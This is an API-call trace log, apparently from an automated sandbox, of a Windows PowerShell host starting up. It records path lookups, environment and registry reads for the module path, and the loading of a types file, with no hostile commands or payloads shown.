	[0763.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0763.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0763.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0763.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0763.759] CoCreateGuid (in: pguid=0x14dc90 | out: pguid=0x14dc90*(Data1=0x83a04ee9, Data2=0xcb78, Data3=0x4486, Data4=([0]=0xa9, [1]=0x4a, [2]=0x55, [3]=0xd2, [4]=0x44, [5]=0x72, [6]=0x63, [7]=0x4b))) returned 0x0
	[0763.759] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.759] CoTaskMemFree (pv=0x24c0e0) 
	[0763.763] WinSqmIsOptedIn () returned 0x0
	[0763.763] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.764] CoTaskMemFree (pv=0x24c0e0) 
	[0763.764] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.765] CoTaskMemFree (pv=0x24c0e0) 
	[0763.765] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.765] CoTaskMemFree (pv=0x24c0e0) 
	[0763.766] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.766] CoTaskMemFree (pv=0x24c0e0) 
	[0763.766] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.767] CoTaskMemFree (pv=0x24c0e0) 
	[0763.768] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.768] CoTaskMemFree (pv=0x24c0e0) 
	[0763.768] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.768] CoTaskMemFree (pv=0x24c0e0) 
	[0763.769] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.769] CoTaskMemFree (pv=0x24c0e0) 
	[0763.771] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.771] CoTaskMemFree (pv=0x24c0e0) 
	[0763.776] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.776] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.776] CoTaskMemFree (pv=0x24c0e0) 
	[0763.777] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.777] CoTaskMemFree (pv=0x24c0e0) 
	[0763.777] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0763.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.777] CoTaskMemFree (pv=0x24c0e0) 
	[0763.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0763.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0763.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0763.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.531] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0779.531] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0779.531] CoTaskMemFree (pv=0x24c0e0) 
	[0779.533] CoTaskMemAlloc (cb=0xcc) returned 0x1ba5cd20
	[0779.533] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1ba5cd20, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0779.533] CoTaskMemFree (pv=0x1ba5cd20) 
	[0779.533] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d808 | out: phkResult=0x14d808*=0x314) returned 0x0
	[0779.533] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d78c, lpData=0x0, lpcbData=0x14d788*=0x0 | out: lpType=0x14d78c*=0x2, lpData=0x0, lpcbData=0x14d788*=0x6c) returned 0x0
	[0779.533] CoTaskMemAlloc (cb=0x70) returned 0x1d0a60
	[0779.533] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d75c, lpData=0x1d0a60, lpcbData=0x14d758*=0x6c | out: lpType=0x14d75c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x14d758*=0x6c) returned 0x0
	[0779.533] CoTaskMemFree (pv=0x1d0a60) 
	[0779.533] CoTaskMemAlloc (cb=0xcc) returned 0x1ba5cd20
	[0779.533] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1ba5cd20, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0779.534] CoTaskMemFree (pv=0x1ba5cd20) 
	[0779.534] CoTaskMemAlloc (cb=0xcc) returned 0x1ba5cd20
	[0779.534] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1ba5cd20, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0779.534] CoTaskMemFree (pv=0x1ba5cd20) 
	[0779.538] RegCloseKey (hKey=0x314) returned 0x0
	[0779.538] CoTaskMemAlloc (cb=0xcc) returned 0x1ba5cd20
	[0779.538] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1ba5cd20, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0779.538] CoTaskMemFree (pv=0x1ba5cd20) 
	[0779.538] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d808 | out: phkResult=0x14d808*=0x314) returned 0x0
	[0779.538] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d78c, lpData=0x0, lpcbData=0x14d788*=0x0 | out: lpType=0x14d78c*=0x0, lpData=0x0, lpcbData=0x14d788*=0x0) returned 0x2
	[0779.538] RegCloseKey (hKey=0x314) returned 0x0
	[0779.544] CoTaskMemAlloc (cb=0x20c) returned 0x235d40
	[0779.545] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x235d40 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0779.546] CoTaskMemFree (pv=0x235d40) 
	[0779.546] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0779.547] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0779.560] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0779.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0779.561] CoTaskMemFree (pv=0x24c0e0) 
	[0779.563] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0779.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0779.563] CoTaskMemFree (pv=0x24c0e0) 
	[0783.133] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0783.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.133] CoTaskMemFree (pv=0x24c0e0) 
	[0783.133] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0783.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.133] CoTaskMemFree (pv=0x24c0e0) 
	[0783.135] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5f8 | out: phkResult=0x14d5f8*=0x2f4) returned 0x0
	[0783.135] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d60c, lpData=0x0, lpcbData=0x14d608*=0x0 | out: lpType=0x14d60c*=0x1, lpData=0x0, lpcbData=0x14d608*=0x74) returned 0x0
	[0783.135] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d57c, lpData=0x0, lpcbData=0x14d578*=0x0 | out: lpType=0x14d57c*=0x1, lpData=0x0, lpcbData=0x14d578*=0x74) returned 0x0
	[0783.136] CoTaskMemAlloc (cb=0x78) returned 0x1d0a60
	[0783.136] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d54c, lpData=0x1d0a60, lpcbData=0x14d548*=0x74 | out: lpType=0x14d54c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d548*=0x74) returned 0x0
	[0783.136] CoTaskMemFree (pv=0x1d0a60) 
	[0783.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0783.136] SetErrorMode (uMode=0x1) returned 0x1
	[0783.136] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d4d0 | out: lpFileInformation=0x14d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0783.136] SetErrorMode (uMode=0x1) returned 0x1
	[0783.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0783.137] SetErrorMode (uMode=0x1) returned 0x1
	[0783.137] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d4d0 | out: lpFileInformation=0x14d4d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0783.137] SetErrorMode (uMode=0x1) returned 0x1
	[0783.139] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0783.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.139] CoTaskMemFree (pv=0x24c0e0) 
	[0783.140] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0783.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.140] CoTaskMemFree (pv=0x24c0e0) 
	[0783.141] GetACP () returned 0x4e4
	[0783.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0783.148] SetErrorMode (uMode=0x1) returned 0x1
	[0783.149] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0783.150] GetFileType (hFile=0x2fc) returned 0x1
	[0783.150] SetErrorMode (uMode=0x1) returned 0x1
	[0783.150] GetFileType (hFile=0x2fc) returned 0x1
	[0783.152] ReadFile (in: hFile=0x2fc, lpBuffer=0x2cf9c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2cf9c48*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.154] ReadFile (in: hFile=0x2fc, lpBuffer=0x2cf9c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2cf9c48*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.154] ReadFile (in: hFile=0x2fc, lpBuffer=0x2cf9c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2cf9c48*, lpNumberOfBytesRead=0x14d408*=0x1000, lpOverlapped=0x0) returned 1
	[0783.154] ReadFile (in: hFile=0x2fc, lpBuffer=0x2cf9c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2cf9c48*, lpNumberOfBytesRead=0x14d408*=0xcf3, lpOverlapped=0x0) returned 1
	[0783.155] ReadFile (in: hFile=0x2fc, lpBuffer=0x2cf90a3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2cf90a3*, lpNumberOfBytesRead=0x14d408*=0x0, lpOverlapped=0x0) returned 1
	[0783.155] ReadFile (in: hFile=0x2fc, lpBuffer=0x2cf9c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d408, lpOverlapped=0x0 | out: lpBuffer=0x2cf9c48*, lpNumberOfBytesRead=0x14d408*=0x0, lpOverlapped=0x0) returned 1
	[0783.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0783.157] SetErrorMode (uMode=0x1) returned 0x1
	[0783.157] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d380 | out: lpFileInformation=0x14d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0783.157] SetErrorMode (uMode=0x1) returned 0x1
	[0783.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0783.158] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d468 | out: phkResult=0x14d468*=0x2fc) returned 0x0
	[0783.158] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d3ec, lpData=0x0, lpcbData=0x14d3e8*=0x0 | out: lpType=0x14d3ec*=0x1, lpData=0x0, lpcbData=0x14d3e8*=0x56) returned 0x0
	[0783.158] CoTaskMemAlloc (cb=0x5a) returned 0x232500
	[0783.158] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d3bc, lpData=0x232500, lpcbData=0x14d3b8*=0x56 | out: lpType=0x14d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d3b8*=0x56) returned 0x0
	[0783.159] CoTaskMemFree (pv=0x232500) 
	[0783.159] RegCloseKey (hKey=0x2fc) returned 0x0
	[0783.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0783.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0783.895] VirtualQuery (in: lpAddress=0x14c150, lpBuffer=0x14d010, dwLength=0x30 | out: lpBuffer=0x14d010*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
